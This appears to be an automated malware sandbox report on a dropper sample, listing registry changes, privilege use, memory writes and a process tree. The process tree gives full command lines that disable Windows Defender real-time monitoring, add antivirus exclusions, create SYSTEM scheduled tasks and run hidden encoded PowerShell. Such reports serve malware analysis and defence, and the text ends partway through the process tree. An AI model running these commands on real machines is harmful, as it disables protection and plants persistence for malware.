Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | JyKDiOp.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | JyKDiOp.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6\WpadDecisionTime = e09ec3fa62ceda01 | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6 | rundll32.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | JyKDiOp.exe
Scheduled Task/Job: Scheduled Task (1 TTP, 12 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2836 | schtasks.exe
2520 | schtasks.exe
2808 | schtasks.exe
2872 | schtasks.exe
1412 | schtasks.exe
1284 | schtasks.exe
2608 | schtasks.exe
2568 | schtasks.exe
2708 | schtasks.exe
2200 | schtasks.exe
2600 | schtasks.exe
1516 | schtasks.exe
Suspicious behavior: EnumeratesProcesses (30 IoCs)
pid | Process
2788 | powershell.exe
2256 | powershell.EXE
2256 | powershell.EXE
2256 | powershell.EXE
1376 | powershell.EXE
1376 | powershell.EXE
1376 | powershell.EXE
1688 | powershell.exe
2084 | powershell.EXE
2084 | powershell.EXE
2084 | powershell.EXE
2228 | JyKDiOp.exe
2228 | JyKDiOp.exe
2228 | JyKDiOp.exe
2228 | JyKDiOp.exe
2228 | JyKDiOp.exe
2036 | powershell.exe
2228 | JyKDiOp.exe
2228 | JyKDiOp.exe
2228 | JyKDiOp.exe
2068 | powershell.exe
2228 | JyKDiOp.exe
2228 | JyKDiOp.exe
2228 | JyKDiOp.exe
2228 | JyKDiOp.exe
2228 | JyKDiOp.exe
2228 | JyKDiOp.exe
2228 | JyKDiOp.exe
2228 | JyKDiOp.exe
2228 | JyKDiOp.exe
Suspicious use of AdjustPrivilegeToken (63 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2788 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 2756 | WMIC.exe
Token: SeSecurityPrivilege | 2756 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 2756 | WMIC.exe
Token: SeLoadDriverPrivilege | 2756 | WMIC.exe
Token: SeSystemProfilePrivilege | 2756 | WMIC.exe
Token: SeSystemtimePrivilege | 2756 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 2756 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 2756 | WMIC.exe
Token: SeCreatePagefilePrivilege | 2756 | WMIC.exe
Token: SeBackupPrivilege | 2756 | WMIC.exe
Token: SeRestorePrivilege | 2756 | WMIC.exe
Token: SeShutdownPrivilege | 2756 | WMIC.exe
Token: SeDebugPrivilege | 2756 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 2756 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 2756 | WMIC.exe
Token: SeUndockPrivilege | 2756 | WMIC.exe
Token: SeManageVolumePrivilege | 2756 | WMIC.exe
Token: 33 | 2756 | WMIC.exe
Token: 34 | 2756 | WMIC.exe
Token: 35 | 2756 | WMIC.exe
Token: SeDebugPrivilege | 2256 | powershell.EXE
Token: SeDebugPrivilege | 1376 | powershell.EXE
Token: SeDebugPrivilege | 1688 | powershell.exe
Token: SeAssignPrimaryTokenPrivilege | 2136 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 2136 | WMIC.exe
Token: SeSecurityPrivilege | 2136 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 2136 | WMIC.exe
Token: SeLoadDriverPrivilege | 2136 | WMIC.exe
Token: SeSystemtimePrivilege | 2136 | WMIC.exe
Token: SeBackupPrivilege | 2136 | WMIC.exe
Token: SeRestorePrivilege | 2136 | WMIC.exe
Token: SeShutdownPrivilege | 2136 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 2136 | WMIC.exe
Token: SeUndockPrivilege | 2136 | WMIC.exe
Token: SeManageVolumePrivilege | 2136 | WMIC.exe
Token: SeDebugPrivilege | 2084 | powershell.EXE
Token: SeDebugPrivilege | 2036 | powershell.exe
Token: SeAssignPrimaryTokenPrivilege | 1320 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 1320 | WMIC.exe
Token: SeSecurityPrivilege | 1320 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 1320 | WMIC.exe
Token: SeLoadDriverPrivilege | 1320 | WMIC.exe
Token: SeSystemtimePrivilege | 1320 | WMIC.exe
Token: SeBackupPrivilege | 1320 | WMIC.exe
Token: SeRestorePrivilege | 1320 | WMIC.exe
Token: SeShutdownPrivilege | 1320 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 1320 | WMIC.exe
Token: SeUndockPrivilege | 1320 | WMIC.exe
Token: SeManageVolumePrivilege | 1320 | WMIC.exe
Token: SeDebugPrivilege | 2068 | powershell.exe
Token: SeAssignPrimaryTokenPrivilege | 1152 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 1152 | WMIC.exe
Token: SeSecurityPrivilege | 1152 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 1152 | WMIC.exe
Token: SeLoadDriverPrivilege | 1152 | WMIC.exe
Token: SeSystemtimePrivilege | 1152 | WMIC.exe
Token: SeBackupPrivilege | 1152 | WMIC.exe
Token: SeRestorePrivilege | 1152 | WMIC.exe
Token: SeShutdownPrivilege | 1152 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 1152 | WMIC.exe
Token: SeUndockPrivilege | 1152 | WMIC.exe
Token: SeManageVolumePrivilege | 1152 | WMIC.exe
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 2848 wrote to memory of 3004 | 2848 | 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe | 28
PID 2848 wrote to memory of 3004 | 2848 | 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe | 28
PID 2848 wrote to memory of 3004 | 2848 | 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe | 28
PID 2848 wrote to memory of 3004 | 2848 | 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe | 28
PID 2848 wrote to memory of 3004 | 2848 | 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe | 28
PID 2848 wrote to memory of 3004 | 2848 | 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe | 28
PID 2848 wrote to memory of 3004 | 2848 | 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe | 28
PID 3004 wrote to memory of 2144 | 3004 | Install.exe | 29
PID 3004 wrote to memory of 2144 | 3004 | Install.exe | 29
PID 3004 wrote to memory of 2144 | 3004 | Install.exe | 29
PID 3004 wrote to memory of 2144 | 3004 | Install.exe | 29
PID 3004 wrote to memory of 2144 | 3004 | Install.exe | 29
PID 3004 wrote to memory of 2144 | 3004 | Install.exe | 29
PID 3004 wrote to memory of 2144 | 3004 | Install.exe | 29
PID 2144 wrote to memory of 2532 | 2144 | Install.exe | 31
PID 2144 wrote to memory of 2532 | 2144 | Install.exe | 31
PID 2144 wrote to memory of 2532 | 2144 | Install.exe | 31
PID 2144 wrote to memory of 2532 | 2144 | Install.exe | 31
PID 2144 wrote to memory of 2532 | 2144 | Install.exe | 31
PID 2144 wrote to memory of 2532 | 2144 | Install.exe | 31
PID 2144 wrote to memory of 2532 | 2144 | Install.exe | 31
PID 2532 wrote to memory of 2808 | 2532 | forfiles.exe | 33
PID 2532 wrote to memory of 2808 | 2532 | forfiles.exe | 33
PID 2532 wrote to memory of 2808 | 2532 | forfiles.exe | 33
PID 2532 wrote to memory of 2808 | 2532 | forfiles.exe | 33
PID 2532 wrote to memory of 2808 | 2532 | forfiles.exe | 33
PID 2532 wrote to memory of 2808 | 2532 | forfiles.exe | 33
PID 2532 wrote to memory of 2808 | 2532 | forfiles.exe | 33
PID 2808 wrote to memory of 2788 | 2808 | cmd.exe | 34
PID 2808 wrote to memory of 2788 | 2808 | cmd.exe | 34
PID 2808 wrote to memory of 2788 | 2808 | cmd.exe | 34
PID 2808 wrote to memory of 2788 | 2808 | cmd.exe | 34
PID 2808 wrote to memory of 2788 | 2808 | cmd.exe | 34
PID 2808 wrote to memory of 2788 | 2808 | cmd.exe | 34
PID 2808 wrote to memory of 2788 | 2808 | cmd.exe | 34
PID 2788 wrote to memory of 2756 | 2788 | powershell.exe | 35
PID 2788 wrote to memory of 2756 | 2788 | powershell.exe | 35
PID 2788 wrote to memory of 2756 | 2788 | powershell.exe | 35
PID 2788 wrote to memory of 2756 | 2788 | powershell.exe | 35
PID 2788 wrote to memory of 2756 | 2788 | powershell.exe | 35
PID 2788 wrote to memory of 2756 | 2788 | powershell.exe | 35
PID 2788 wrote to memory of 2756 | 2788 | powershell.exe | 35
PID 2144 wrote to memory of 2600 | 2144 | Install.exe | 36
PID 2144 wrote to memory of 2600 | 2144 | Install.exe | 36
PID 2144 wrote to memory of 2600 | 2144 | Install.exe | 36
PID 2144 wrote to memory of 2600 | 2144 | Install.exe | 36
PID 2144 wrote to memory of 2600 | 2144 | Install.exe | 36
PID 2144 wrote to memory of 2600 | 2144 | Install.exe | 36
PID 2144 wrote to memory of 2600 | 2144 | Install.exe | 36
PID 2028 wrote to memory of 2472 | 2028 | taskeng.exe | 41
PID 2028 wrote to memory of 2472 | 2028 | taskeng.exe | 41
PID 2028 wrote to memory of 2472 | 2028 | taskeng.exe | 41
PID 2028 wrote to memory of 2472 | 2028 | taskeng.exe | 41
PID 2472 wrote to memory of 1284 | 2472 | tgOgpoU.exe | 42
PID 2472 wrote to memory of 1284 | 2472 | tgOgpoU.exe | 42
PID 2472 wrote to memory of 1284 | 2472 | tgOgpoU.exe | 42
PID 2472 wrote to memory of 1284 | 2472 | tgOgpoU.exe | 42
PID 2472 wrote to memory of 1264 | 2472 | tgOgpoU.exe | 44
PID 2472 wrote to memory of 1264 | 2472 | tgOgpoU.exe | 44
PID 2472 wrote to memory of 1264 | 2472 | tgOgpoU.exe | 44
PID 2472 wrote to memory of 1264 | 2472 | tgOgpoU.exe | 44
PID 340 wrote to memory of 2256 | 340 | taskeng.exe | 47
PID 340 wrote to memory of 2256 | 340 | taskeng.exe | 47
PID 340 wrote to memory of 2256 | 340 | taskeng.exe | 47
Processes

Process tree, nested by parent. Each entry gives the image path and PID, the command line as recorded, and the behaviour flags the sandbox raised for that process.

- C:\Users\Admin\AppData\Local\Temp\57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe (PID 2848)
  command: "C:\Users\Admin\AppData\Local\Temp\57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe"
  flags: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\7zS194B.tmp\Install.exe (PID 3004)
    command: .\Install.exe
    flags: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\7zS1B2E.tmp\Install.exe (PID 2144)
      command: .\Install.exe /FvdidQpG "525403" /S
      flags: Checks BIOS information in registry; Executes dropped EXE; Loads dropped DLL; Enumerates system info in registry; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\forfiles.exe (PID 2532)
        command: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        flags: Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\cmd.exe (PID 2808)
          command: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
          flags: Suspicious use of WriteProcessMemory
          - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2788)
            command: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            flags: Command and Scripting Interpreter: PowerShell; Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
            - C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 2756)
              command: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              flags: Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\schtasks.exe (PID 2600)
        command: schtasks /CREATE /TN "bmQWCxleEgxbTUrSZz" /SC once /ST 22:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo\lWMApHnNtvIHqRb\tgOgpoU.exe\" xv /vSmdidC 525403 /S" /V1 /F
        flags: Drops file in Windows directory; Scheduled Task/Job: Scheduled Task
      - C:\Windows\SysWOW64\WerFault.exe (PID 316)
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 580
        flags: Loads dropped DLL; Program crash
- C:\Windows\system32\taskeng.exe (PID 2028)
  command: taskeng.exe {8B9E9C08-D96E-47CC-B332-90ED665C187E} S-1-5-18:NT AUTHORITY\System:Service:
  flags: Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo\lWMApHnNtvIHqRb\tgOgpoU.exe (PID 2472)
    command: C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo\lWMApHnNtvIHqRb\tgOgpoU.exe xv /vSmdidC 525403 /S
    flags: Executes dropped EXE; Drops file in System32 directory; Modifies data under HKEY_USERS; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\schtasks.exe (PID 1284)
      command: schtasks /CREATE /TN "gCfUWcXkf" /SC once /ST 18:33:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      flags: Scheduled Task/Job: Scheduled Task
    - C:\Windows\SysWOW64\schtasks.exe (PID 1264)
      command: schtasks /run /I /tn "gCfUWcXkf"
    - C:\Windows\SysWOW64\schtasks.exe (PID 1816)
      command: schtasks /DELETE /F /TN "gCfUWcXkf"
    - C:\Windows\SysWOW64\cmd.exe (PID 328)
      command: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      - C:\Windows\SysWOW64\reg.exe (PID 2168)
        command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
        flags: Modifies Windows Defender Real-time Protection settings
    - C:\Windows\SysWOW64\cmd.exe (PID 1996)
      command: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      - C:\Windows\SysWOW64\reg.exe (PID 1984)
        command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
        flags: Modifies Windows Defender Real-time Protection settings
    - C:\Windows\SysWOW64\schtasks.exe (PID 1516)
      command: schtasks /CREATE /TN "gRcGeUXaa" /SC once /ST 08:33:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      flags: Scheduled Task/Job: Scheduled Task
    - C:\Windows\SysWOW64\schtasks.exe (PID 1316)
      command: schtasks /run /I /tn "gRcGeUXaa"
    - C:\Windows\SysWOW64\schtasks.exe (PID 1820)
      command: schtasks /DELETE /F /TN "gRcGeUXaa"
    - C:\Windows\SysWOW64\forfiles.exe (PID 1664)
      command: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
      - C:\Windows\SysWOW64\cmd.exe (PID 1580)
        command: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1688)
          command: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
          flags: Command and Scripting Interpreter: PowerShell; Drops file in System32 directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
          - C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 2136)
            command: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
            flags: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\cmd.exe (PID 1240)
      command: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
      - C:\Windows\SysWOW64\reg.exe (PID 2180)
        command: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
        flags: Windows security bypass
    - C:\Windows\SysWOW64\cmd.exe (PID 664)
      command: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
      - C:\Windows\SysWOW64\reg.exe (PID 3024)
        command: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
        flags: Windows security bypass
    - C:\Windows\SysWOW64\cmd.exe (PID 2692)
      command: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
      - C:\Windows\SysWOW64\reg.exe (PID 2540)
        command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
    - C:\Windows\SysWOW64\cmd.exe (PID 2536)
      command: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
      - C:\Windows\SysWOW64\reg.exe (PID 2576)
        command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
    - C:\Windows\SysWOW64\cmd.exe (PID 2684)
      command: cmd /C copy nul "C:\Windows\Temp\ruCXiJvmKkuTmmIt\nBppcpdZ\ahHQenwSVcyoUFLD.wsf"
    - C:\Windows\SysWOW64\wscript.exe (PID 2572)
      command: wscript "C:\Windows\Temp\ruCXiJvmKkuTmmIt\nBppcpdZ\ahHQenwSVcyoUFLD.wsf"
      flags: Modifies data under HKEY_USERS
      - C:\Windows\SysWOW64\reg.exe (PID 1956)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:32
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 2616)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:64
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 2936)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:32
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 2404)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:64
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 1668)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:32
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 1312)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:64
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 2592)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:32
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 2836)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:64
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 2412)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:32
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 1052)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:64
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 1504)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NonltQQlyMoZtVVB" /t REG_DWORD /d 0 /reg:32
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 1808)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NonltQQlyMoZtVVB" /t REG_DWORD /d 0 /reg:64
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 1980)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 1420)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 1232)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo" /t REG_DWORD /d 0 /reg:32
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 1308)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo" /t REG_DWORD /d 0 /reg:64
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 1220)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 1716)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
        flags: Windows security bypass
      - C:\Windows\SysWOW64\reg.exe (PID 2156)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:32
      - C:\Windows\SysWOW64\reg.exe (PID 2256)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:64
      - C:\Windows\SysWOW64\reg.exe (PID 540)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:32
      - C:\Windows\SysWOW64\reg.exe (PID 324)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:64
      - C:\Windows\SysWOW64\reg.exe (PID 1104)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:32
      - C:\Windows\SysWOW64\reg.exe (PID 1708)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:64
      - C:\Windows\SysWOW64\reg.exe (PID 2888)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:32
      - C:\Windows\SysWOW64\reg.exe (PID 2296)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:64
      - C:\Windows\SysWOW64\reg.exe (PID 2496)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:32
      - C:\Windows\SysWOW64\reg.exe (PID 1964)
